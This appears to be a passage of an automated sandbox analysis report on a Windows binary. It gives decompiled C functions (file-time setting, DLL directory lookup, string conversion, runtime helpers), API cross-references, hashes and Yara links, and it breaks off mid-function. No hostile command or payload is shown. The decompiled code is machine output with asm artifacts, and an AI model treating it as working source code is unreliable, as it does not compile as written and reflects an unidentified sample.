Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Create$EnterEventH_prologInitializeLeaveSemaphore_malloc
String ID: PD
API String ID: 561891284-2666890729
Opcode ID: b67d849afc3ca54c2f79a9f09c0c06d22335e170ca01bcbfcbe711515afea754
Instruction ID: f2acdb19e4b0480b6eb140c3a0bdf228871e991e4d69b67839de2b6fdf8a9e25
Opcode Fuzzy Hash: b67d849afc3ca54c2f79a9f09c0c06d22335e170ca01bcbfcbe711515afea754
Instruction Fuzzy Hash: 4BF05E35A01110EBD708EF69EA466DD77A4FB09708F04413BF806E3B80EB785881CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00410AAB, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00410AAB(void* __ecx, void* _a4) {
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					E0040634C(_t6, 0x432a6c, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff);
					return E004062C3(0x432a6c, 2);
				}
				return _t2;
			}

0x00410aab
0x00410ab1
0x00410aba
0x00410ac3
0x00410ad1
0x00000000
0x00410ae2
0x00410ae3

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00410C79,?), ref: 00410AB1
GetLastError.KERNEL32(?), ref: 00410ABD

Part of subcall function 0040634C: __vswprintf_c_l.LIBCMT ref: 0040636A

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00410AC6
l*C, xrefs: 00410ACB

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d$l*C
API String ID: 1091760877-2138763960
Opcode ID: b917d5b0c9dbf2040bb382ff97f9e2b4c6e6d87b44ce640982afb4bbf59be02f
Instruction ID: 4f788a06021f14a0b8b29579b4d612f00f01918e05bc4057fba5e750a26fa9e6
Opcode Fuzzy Hash: b917d5b0c9dbf2040bb382ff97f9e2b4c6e6d87b44ce640982afb4bbf59be02f
Instruction Fuzzy Hash: 72D02E32A0802027CA003724BC0AE9F34006F11330FA04B66FD32602E2CB7E0AB282DE

Uniqueness

Uniqueness Score: -1.00%

Function 00410A27, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00410A27(signed char _a4) {
				struct HINSTANCE__* _t2;

				_t2 = GetModuleHandleW(L"kernel32");
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t2, "SetDllDirectoryW");
					if(_t2 != 0) {
						asm("sbb ecx, ecx");
						return _t2->i( ~(_a4 & 0x000000ff) & 0x0042a53c);
					}
				}
				return _t2;
			}

0x00410a2c
0x00410a34
0x00410a3c
0x00410a44
0x00410a4d
0x00000000
0x00410a56
0x00410a44
0x00410a58

APIs

GetModuleHandleW.KERNEL32(kernel32,0040FB50,00000001), ref: 00410A2C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00410A3C

Strings

kernel32, xrefs: 00410A27
SetDllDirectoryW, xrefs: 00410A36

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: SetDllDirectoryW$kernel32
API String ID: 1646373207-2052158636
Opcode ID: fca92966547bc7a6c664fabd3397b14b3315be57dcab09f3fcdad2308edac9b8
Instruction ID: a329fcd76731013b8f3be7928ad269251b8838cb673c5638addfc82e0a1c6549
Opcode Fuzzy Hash: fca92966547bc7a6c664fabd3397b14b3315be57dcab09f3fcdad2308edac9b8
Instruction Fuzzy Hash: 4FD0A7B07403611787185F316C19F3B37485F60B423A4512E7D06E0081CA6CC0A4962F

Uniqueness

Uniqueness Score: -1.00%

Function 00408EB6, Relevance: 6.1, APIs: 4, Instructions: 128
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00408EB6(WCHAR* _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
				signed char _v5;
				signed char _v6;
				signed char _v7;
				char _v8;
				void* _v12;
				signed char _v16;
				void* _v24;
				void* _v32;
				void* _v40;
				short _v4136;
				signed int* _t48;
				signed int* _t49;
				signed int* _t50;
				signed char _t51;
				void* _t52;
				void* _t63;

				E0041A3E0(0x1024);
				_t48 = _a8;
				if(_t48 == 0) {
					L2:
					_v7 = 0;
				} else {
					_v7 = 1;
					if(( *_t48 | _t48[1]) == 0) {
						goto L2;
					}
				}
				_t49 = _a12;
				if(_t49 == 0) {
					L5:
					_v6 = 0;
				} else {
					_v6 = 1;
					if(( *_t49 | _t49[1]) == 0) {
						goto L5;
					}
				}
				_t50 = _a16;
				if(_t50 == 0) {
					L8:
					_v5 = 0;
				} else {
					_v5 = 1;
					if(( *_t50 | _t50[1]) == 0) {
						goto L8;
					}
				}
				_t51 = E00408DC2(_a4);
				_v16 = _t51;
				if(_t51 == 0xffffffff || (_t51 & 0x00000001) == 0) {
					_v8 = 0;
				} else {
					_v8 = 1;
					E00408E0E(_a4, 0);
				}
				_t52 = CreateFileW(_a4, 0x40000000, 3, 0, 3, 0x2000000, 0);
				_v12 = _t52;
				if(_t52 != 0xffffffff) {
					L15:
					if(_v7 != 0) {
						E00410EF6(_a8,  &_v40);
					}
					if(_v6 != 0) {
						E00410EF6(_a12,  &_v32);
					}
					if(_v5 != 0) {
						E00410EF6(_a16,  &_v24);
					}
					asm("sbb eax, eax");
					asm("sbb eax, eax");
					asm("sbb eax, eax");
					SetFileTime(_v12,  ~(_v6 & 0x000000ff) &  &_v32,  ~(_v5 & 0x000000ff) &  &_v24,  ~(_v7 & 0x000000ff) &  &_v40);
					_t63 = CloseHandle(_v12);
					if(_v8 != 0) {
						return E00408E0E(_a4, _v16);
					}
				} else {
					_t63 = E0040A582(_a4,  &_v4136, 0x800);
					if(_t63 != 0) {
						_t63 = CreateFileW( &_v4136, 0x40000000, 3, 0, 3, 0x2000000, 0);
						_v12 = _t63;
						if(_t63 != 0xffffffff) {
							goto L15;
						}
					}
				}
				return _t63;
			}

0x00408ebe
0x00408ec3
0x00408ecd
0x00408eda
0x00408eda
0x00408ecf
0x00408ed4
0x00408ed8
0x00000000
0x00000000
0x00408ed8
0x00408ede
0x00408ee3
0x00408ef0
0x00408ef0
0x00408ee5
0x00408eea
0x00408eee
0x00000000
0x00000000
0x00408eee
0x00408ef4
0x00408ef9
0x00408f06
0x00408f06
0x00408efb
0x00408f00
0x00408f04
0x00000000
0x00000000
0x00408f04
0x00408f0d
0x00408f12
0x00408f18
0x0040901d
0x00408f26
0x00408f2a
0x00408f2e
0x00408f2e
0x00408f4e
0x00408f50
0x00408f56
0x00408f93
0x00408f97
0x00408fa0
0x00408fa0
0x00408fa9
0x00408fb2
0x00408fb2
0x00408fbb
0x00408fc4
0x00408fc4
0x00408fcf
0x00408fdd
0x00408feb
0x00408ff6
0x00408fff
0x00409009
0x00000000
0x00409011
0x00408f58
0x00408f67
0x00408f6e
0x00408f85
0x00408f87
0x00408f8d
0x00000000
0x00000000
0x00408f8d
0x00408f6e
0x0040901a

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,004072B4,?,?,?), ref: 00408F4E
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,004072B4,?,?,?,?), ref: 00408F85
SetFileTime.KERNEL32(?,00000000,00000000,00000000,?,004072B4,?,?,?,?,?,?,?), ref: 00408FF6
CloseHandle.KERNEL32(?,?,004072B4,?,?,?,?,?,?,?), ref: 00408FFF

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 49bcb6f9e9810a6fe0be4aad53296f7a34c73dbf13b6a702f5a71c58f46ea2e3
Instruction ID: 5196002dcb37c8a4ac62c562b4d10a45802be8b069fc91657f9b2f47d6823d06
Opcode Fuzzy Hash: 49bcb6f9e9810a6fe0be4aad53296f7a34c73dbf13b6a702f5a71c58f46ea2e3
Instruction Fuzzy Hash: B941AD30900259AEDF11CBA4CD45FEE7BB8AF05304F1444AAF481F72D2CA789E85CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00424A9E, Relevance: 6.1, APIs: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00424A9E(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0041C9F8( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00422189( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0041E7AE(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x00424aa8
0x00424aaf
0x00424ac6
0x00000000
0x00424ab6
0x00424ab8
0x00424ad2
0x00424ad7
0x00424ada
0x00424add
0x00424b06
0x00424b0d
0x00424b0f
0x00424b90
0x00424bab
0x00424bad
0x00424aed
0x00424aed
0x00424af0
0x00424af2
0x00424af5
0x00424af5
0x00424af5
0x00424af5
0x00000000
0x00424afb
0x00424b6f
0x00424b6f
0x00424b74
0x00424b7a
0x00424b7d
0x00424b7f
0x00424b82
0x00424b82
0x00424b82
0x00424b82
0x00000000
0x00424b86
0x00424b11
0x00424b14
0x00424b1a
0x00424b1d
0x00424b44
0x00424b47
0x00424b4d
0x00000000
0x00000000
0x00424b4f
0x00424b52
0x00000000
0x00000000
0x00424b54
0x00424b54
0x00424b5a
0x00424b5d
0x00424acb
0x00424acb
0x00424b66
0x00000000
0x00424b66
0x00424b1f
0x00424b22
0x00000000
0x00000000
0x00424b26
0x00424b37
0x00424b3d
0x00424b3f
0x00424b42
0x00000000
0x00000000
0x00000000
0x00424b42
0x00424adf
0x00424ae2
0x00424ae4
0x00424aea
0x00424aea
0x00000000
0x00424aba
0x00424aba
0x00424abf
0x00424ac3
0x00424ac3
0x00000000
0x00424abf
0x00424ab8

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00424AD2
__isleadbyte_l.LIBCMT ref: 00424B06
MultiByteToWideChar.KERNEL32(00000080,00000009,0041A2AA,?,00000000,00000000,?,?,?,?,0041A2AA,00000000,?), ref: 00424B37
MultiByteToWideChar.KERNEL32(00000080,00000009,0041A2AA,00000001,00000000,00000000,?,?,?,?,0041A2AA,00000000,?), ref: 00424BA5

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: e66c65d74d8b213d7713b2c7fa364c2bb73acde342c6a75df7f729a50827f81a
Instruction ID: 015937530d443020b95feaa75637c1581021f4293452890fae75afedf5c56a4f
Opcode Fuzzy Hash: e66c65d74d8b213d7713b2c7fa364c2bb73acde342c6a75df7f729a50827f81a
Instruction Fuzzy Hash: 9B31F330B00266EFDB20DF68E884ABE3BA5FF81311F5945AAE4618B291D334DD40DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00412BD8, Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412BD8(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				void* __edi;
				char _t21;
				void* _t25;
				char _t27;
				char _t31;
				void* _t32;
				char _t33;
				void* _t34;

				_t34 = __ecx;
				_t27 = 1;
				 *((char*)(__ecx + 0xa6c)) = 1;
				 *((intOrPtr*)(__ecx + 0x660)) = _a4;
				E00412A5D(__ecx, __edx, __eflags);
				 *((char*)(__ecx + 0x86c)) = 0;
				 *((char*)(__ecx + 0x86d)) = 2;
				E0041A110(_t32, __ecx + 0x86e, 4, 9);
				E0041A110(_t32, _t34 + 0x877, 6, 0xf5);
				_t21 = 0;
				do {
					 *((char*)(_t34 + _t21 + 0x76c)) = _t21;
					_t21 = _t21 + 1;
				} while (_t21 < 3);
				_t31 = _t21;
				_t33 = 1;
				while(_t21 < 0x100) {
					_t33 = _t33 - 1;
					__eflags = _t33;
					 *((char*)(_t34 + _t21 + 0x76c)) = _t31;
					if(_t33 == 0) {
						_t27 = _t27 + 1;
						_t33 = _t27;
						_t31 = _t31 + 1;
						__eflags = _t31;
					}
					_t21 = _t21 + 1;
					__eflags = _t21;
				}
				E0041A110(_t33, _t34 + 0x96c, 0, 0x40);
				_t25 = E0041A110(_t33, _t34 + 0x9ac, 8, 0xc0);
				 *((char*)(_t34 + 0x642)) = 7;
				return _t25;
			}

0x00412bde
0x00412be2
0x00412be4
0x00412bea
0x00412bf0
0x00412c00
0x00412c07
0x00412c0e
0x00412c21
0x00412c29
0x00412c2b
0x00412c2b
0x00412c32
0x00412c33
0x00412c38
0x00412c3a
0x00412c52
0x00412c43
0x00412c43
0x00412c44
0x00412c4b
0x00412c4d
0x00412c4e
0x00412c50
0x00412c50
0x00412c50
0x00412c51
0x00412c51
0x00412c51
0x00412c61
0x00412c74
0x00412c7d
0x00412c86

APIs

Part of subcall function 00412A5D: _memset.LIBCMT ref: 00412A77

_memset.LIBCMT ref: 00412C0E
_memset.LIBCMT ref: 00412C21
_memset.LIBCMT ref: 00412C61
_memset.LIBCMT ref: 00412C74

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: ad9d8c42aeaf4d75aaeb2aee9f9f9f5e2a8878b3fff0c103e6d72283d687ea4e
Instruction ID: 89e74c55be15e433102376671ed0b37f8de0a768e30670420634257213954404
Opcode Fuzzy Hash: ad9d8c42aeaf4d75aaeb2aee9f9f9f5e2a8878b3fff0c103e6d72283d687ea4e
Instruction Fuzzy Hash: B5118871B44B8069E220D67A8C4AFE7B2CC9B55308F444C2FB3CFC7183D6AAA4558797

Uniqueness

Uniqueness Score: -1.00%

Function 00422E05, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00422E05(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E004226F6(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E004227E6(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00422D0B(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00422C50(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x00422e0a
0x00422e10
0x00422e83
0x00000000
0x00422e17
0x00422e17
0x00422e1a
0x00422e35
0x00422e38
0x00422e58
0x00422e6a
0x00422e3a
0x00422e3a
0x00422e3d
0x00000000
0x00422e3f
0x00422e51
0x00422e51
0x00422e3d
0x00422e88
0x00422e8c
0x00422e1c
0x00422e34
0x00422e34
0x00422e1a

APIs

__cftof_l.LIBCMT ref: 00422E2B

Part of subcall function 00422C50: __fltout2.LIBCMT ref: 00422C7C

__cftog_l.LIBCMT ref: 00422E51
__cftoe_l.LIBCMT ref: 00422E83

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: e549dd0bf3037b246c5c1b96f2ee8ed254ff83575f9abeeebf9628f23d262d1c
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 57117E3214015EBBCF125E85ED058EE3F22BB28354B998516FE2858131D37AC9B2BB85

Uniqueness

Uniqueness Score: -1.00%

Function 0040629E, Relevance: 6.0, APIs: 4, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040629E(void* __ecx, intOrPtr _a4) {
				short _v4612;
				long _t13;
				int _t16;
				signed int _t18;

				if( *((char*)(__ecx + 9)) != 0) {
					return 0;
				} else {
					E0041A3E0(0x1200);
					_push(_t18);
					E0040D452( &_v4612, 0x900, E0040C05C(0x83), _a4);
					_t13 = GetLastError();
					_t16 = MessageBoxW( *0x440cf4,  &_v4612, E0040C05C(0x96), 0x35);
					SetLastError(_t13);
					return _t18 & 0xffffff00 | _t16 == 0x00000004;
				}
			}

0x004062a2
0x004062ab
0x004062a4
0x004115dd
0x004115e2
0x004115fe
0x00411606
0x00411628
0x00411635
0x00411640
0x00411640

APIs

Part of subcall function 0040C05C: LoadStringW.USER32(?,-00432A8C,00000200), ref: 0040C0AD
Part of subcall function 0040C05C: LoadStringW.USER32(?,-00432A8C,00000200), ref: 0040C0BF

_swprintf.LIBCMT ref: 004115FE

Part of subcall function 0040D452: __vswprintf_c_l.LIBCMT ref: 0040D465

GetLastError.KERNEL32 ref: 00411606
MessageBoxW.USER32(?,00000000,00000096,00000035), ref: 00411628
SetLastError.KERNEL32(00000000), ref: 00411635

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLoadString$Message__vswprintf_c_l_swprintf
String ID:
API String ID: 2205000856-0
Opcode ID: dab911f6f28fcf9faf31db3913bdfd9e6a0387ff13a84c4b24fd9785d5ff4dfc
Instruction ID: 10ee859a793cd16a1467a3895e80c275e7a293af847d6190e08e2f2720a9e9d0
Opcode Fuzzy Hash: dab911f6f28fcf9faf31db3913bdfd9e6a0387ff13a84c4b24fd9785d5ff4dfc
Instruction Fuzzy Hash: 5FF0F632540208FBFB1137A09C46FDB3B5CAB19389F0001B7F601E51D3D9799865876D

Uniqueness

Uniqueness Score: -1.00%

Function 00421D09, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00421D09(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x42d9d0);
				E0041F49C(__ebx, __edi, __esi);
				_t28 = E0041E3B4(__ebx, __edx, __edi, _t30);
				_t13 =  *0x42fd9c; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0041E9A3(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x42fe80; // 0x42fda8
					 *((intOrPtr*)(_t29 - 0x1c)) = E00421CCB(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E00421D73();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E0041E3B4(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E00420A85(_t25, _t26, 0x20);
				}
				return E0041F4E1(_t28);
			}

0x00421d09
0x00421d09
0x00421d09
0x00421d09
0x00421d09
0x00421d0b
0x00421d10
0x00421d1a
0x00421d1c
0x00421d24
0x00421d48
0x00421d4a
0x00421d50
0x00421d54
0x00421d57
0x00421d62
0x00421d65
0x00421d6c
0x00421d26
0x00421d26
0x00421d2a
0x00000000
0x00421d2c
0x00421d31
0x00421d31
0x00421d2a
0x00421d36
0x00421d3a
0x00421d3f
0x00421d47

APIs

__getptd.LIBCMT ref: 00421D15

Part of subcall function 0041E3B4: __getptd_noexit.LIBCMT ref: 0041E3B7
Part of subcall function 0041E3B4: __amsg_exit.LIBCMT ref: 0041E3C4

__getptd.LIBCMT ref: 00421D2C
__amsg_exit.LIBCMT ref: 00421D3A
__lock.LIBCMT ref: 00421D4A

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 0631083e69a3ed0535cfcce70ddc5bfe4578254941fb9a0ef1adf2097e5677d4
Instruction ID: 5f6e3ce5cbb90cdf3c5cd8987d18bf91562603b554245cfb34a7f51eb905ef47
Opcode Fuzzy Hash: 0631083e69a3ed0535cfcce70ddc5bfe4578254941fb9a0ef1adf2097e5677d4
Instruction Fuzzy Hash: 3EF06235B50720DBD720FBA6A40278E72B06F50714FD0466FE8119B3E2CB6CA942CA5E

Uniqueness

Uniqueness Score: -1.00%

Function 00402716, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 385
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00402716(intOrPtr __ecx, signed int __edx) {
				signed int _t133;
				char _t134;
				intOrPtr _t135;
				void* _t139;
				signed int _t140;
				unsigned int _t141;
				signed int _t145;
				signed int _t162;
				signed int _t164;
				void* _t169;
				signed int _t170;
				void* _t173;
				signed char _t175;
				void* _t176;
				void* _t178;
				void* _t180;
				void* _t182;
				void* _t184;
				void* _t186;
				void* _t188;
				void* _t198;
				signed char _t200;
				void* _t210;
				signed char _t211;
				signed char _t224;
				signed int _t225;
				signed int _t229;
				void* _t237;
				signed char _t240;
				void* _t241;
				char* _t242;
				void* _t243;
				intOrPtr _t245;
				signed int _t250;
				signed char _t267;
				signed char _t270;
				signed char _t273;
				intOrPtr _t297;
				intOrPtr _t300;
				signed int _t302;
				signed char _t304;
				intOrPtr _t306;
				void* _t308;
				void* _t310;
				signed int _t316;
				signed int _t329;

				_t302 = __edx;
				_t308 = _t310 - 0x6c;
				E0041A3E0(0x20c0);
				_t304 =  *(_t308 + 0x74);
				 *((intOrPtr*)(_t308 + 0x68)) = __ecx;
				_t245 =  *((intOrPtr*)(_t304 + 0x14));
				_t133 = _t245 -  *(_t308 + 0x78);
				if(_t133 <  *(_t304 + 0x18)) {
					L78:
					return _t133;
				}
				 *(_t304 + 0x18) = _t133;
				if(_t245 - _t133 >= 2) {
					_t306 =  *((intOrPtr*)(_t308 + 0x7c));
					while(1) {
						_t133 = E0040B2CE(_t302);
						 *(_t308 + 0x50) = _t302;
						if((_t133 | _t302) == 0) {
							break;
						}
						_t250 =  *(_t304 + 0x18);
						_t302 =  *((intOrPtr*)(_t304 + 0x14)) - _t250;
						if(_t302 == 0) {
							break;
						}
						_t316 =  *(_t308 + 0x50);
						if(_t316 > 0 || _t316 >= 0 && _t133 > _t302) {
							break;
						} else {
							 *(_t308 + 0x5c) = _t250 + _t133;
							_t134 = E0040B2CE(_t302);
							_t237 =  *((intOrPtr*)(_t304 + 0x14)) -  *(_t304 + 0x18);
							 *((intOrPtr*)(_t308 + 0x60)) = _t134;
							 *(_t308 + 0x64) = _t302;
							if( *((intOrPtr*)(_t306 + 4)) == 1 && _t134 == 1 && _t302 == 0) {
								 *((char*)(_t306 + 0x1e)) = _t134;
								_t224 = E0040B2CE(_t302);
								 *(_t308 + 0x74) = _t224;
								if((_t224 & 0x00000001) != 0) {
									_t229 = E0040B2CE(_t302);
									 *(_t308 + 0x54) = _t229;
									if((_t229 | _t302) != 0) {
										_t300 =  *((intOrPtr*)(_t308 + 0x68));
										asm("adc ecx, edx");
